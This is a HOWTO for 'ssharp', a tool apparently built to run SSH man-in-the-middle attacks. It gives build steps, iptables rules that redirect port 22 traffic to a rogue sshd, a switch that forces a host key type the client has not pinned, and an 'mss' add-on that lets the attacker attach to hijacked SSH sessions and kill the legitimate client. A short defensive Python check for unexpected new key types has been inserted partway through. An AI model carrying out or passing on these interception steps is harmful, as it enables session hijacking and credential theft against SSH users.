HOWTO
=====
1.
Think! Only YOU are responsible for your own actions.
Ssharp is provided 'AS IS' without any warranty.
It is for educational and demonstration purposes only.
The author is not responsible for any damage you might cause
when using it.
Ssharp is NOT for free distribution. It is derived from
a BSD-like licensed software and you are NOT allowed to
distribute it.
2.
Preferred prefix is /usr/local.
(Edit ssharp.h to fit your OS and paths if needed)
# configure; make ssh; make
# make install
3.
# cp ssh /usr/local/bin/ssharpclient (or whatever your path is)
(Assuming you already have a sshd package installed; make sure
ssharp can find its hostkeys etc.)
Disable RSA authentication.
4.
For localhost testing:
# iptables -t nat -A OUTPUT -p tcp --sport 1000:5000 --dport 22 -j REDIRECT \
    --to-port 10000
For in-LAN testing:
# iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 10000 -i eth0
# <redirect-magic> :)
(you may need to specify different port ranges if ssh clients come
from src-port 30000+X)
5.
# ./sshd -4 -p 10000
6.
Return to coding.
If you want to use the SSH2-only MiM, add the -7 switch to the line shown in step 5:
# ./sshd -4 -p 10000 -7
This makes sshd work out which key type (DSA or RSA) the client probably
does not already have and forces the use of that type.
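A defender-side check for the key-type switch described above, as an added example (not part of ssharp or this HOWTO): it flags a server that offers a key type not on record for a host that is already pinned under another type. The function names and the known_hosts sample are constructed for illustration; wildcard and negated host patterns are assumed absent.

```python
import base64
import hashlib
import hmac

# Constructed known_hosts content; the key blobs are placeholders, not real keys.
SAMPLE_KNOWN_HOSTS = """\
gw.example.test,192.0.2.10 ssh-rsa CONSTRUCTED-RSA-BLOB
db.example.test ssh-dss CONSTRUCTED-DSA-BLOB
"""

def _host_matches(host_field, host):
    """Match a known_hosts host field (plain list or |1|salt|hash) against host."""
    if host_field.startswith("|1|"):
        # Hashed entry: base64(salt) and base64(HMAC-SHA1(salt, hostname)).
        _, _, salt_b64, hash_b64 = host_field.split("|")
        mac = hmac.new(base64.b64decode(salt_b64), host.encode(), hashlib.sha1)
        return hmac.compare_digest(mac.digest(), base64.b64decode(hash_b64))
    return host in host_field.split(",")

def classify_offer(known_hosts_text, host, offered_type, offered_blob):
    """Classify the host key a server offers against what is already pinned."""
    pinned = {}  # key type -> key blob, for every entry matching this host
    for line in known_hosts_text.splitlines():
        fields = line.split()
        # Skip blanks, comments and @cert-authority / @revoked marker lines.
        if len(fields) < 3 or fields[0].startswith(("#", "@")):
            continue
        if _host_matches(fields[0], host):
            pinned[fields[1]] = fields[2]
    if not pinned:
        return "unknown-host"
    if offered_type in pinned:
        return "match" if pinned[offered_type] == offered_blob else "key-changed"
    # Host is on record, but only under other key types: treat this as
    # suspicious rather than as an ordinary first contact.
    return "new-key-type"

if __name__ == "__main__":
    for host, ktype, blob in [
        ("gw.example.test", "ssh-rsa", "CONSTRUCTED-RSA-BLOB"),
        ("gw.example.test", "ssh-dss", "SOME-OTHER-BLOB"),
        ("db.example.test", "ssh-dss", "SOME-OTHER-BLOB"),
    ]:
        print(host, ktype, classify_offer(SAMPLE_KNOWN_HOSTS, host, ktype, blob))
```

A "new-key-type" result for a long-used host is worth verifying out of band before the key is accepted.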
If you still have some spare time, you may have a look at the ssh-walk script.
If you have even more spare time, you may want to compile ssharp with
the USE_MSS option and install the mss server and client into /usr/local/bin.
Then ssharp will slip the session through a screen-like terminal
which allows you to attach to hijacked SSH sessions. mss-server will
create /tmp/ssharp-IP.PID socket which can be used as argument for
mss-client. If PID is killed and someone attached to the mss-server
beforehand, the legitimate client is killed and you own the session as
the only one. TAKE CARE TO STAY LEGAL!!!
mss can be found at http://stealth.7350.org/
In urgent cases I may be reached through stealth@segfault.net.
Stealth